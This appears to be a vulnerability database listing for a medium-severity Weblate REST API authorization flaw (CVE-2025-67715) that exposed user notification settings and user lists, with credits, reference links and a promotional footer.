MEDIUM 4.3 PyPI
Weblate has Systematic User and Project Enumeration via Broken Authorization in REST API (IDOR)
GHSA-3pmh-24wp-xpf4 · CVE-2025-67715 · PYSEC-2025-233
Published · Modified
Description
Impact
It was possible to retrieve user notification settings or list all users via API.
Patches
References
Thanks to Hector Ruiz Ruiz & NaxusAI for responsibly disclosing this vulnerability to Weblate.
References
- WEB https://github.com/WeblateOrg/weblate/security/advisories/GHSA-3pmh-24wp-xpf4
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2025-67715
- WEB https://github.com/WeblateOrg/weblate/pull/17256
- PACKAGE https://github.com/WeblateOrg/weblate
- WEB https://github.com/pypa/advisory-database/tree/main/vulns/weblate/PYSEC-2025-233.yaml
Ready to move
Start Securing
Free, no credit card | First findings in minutes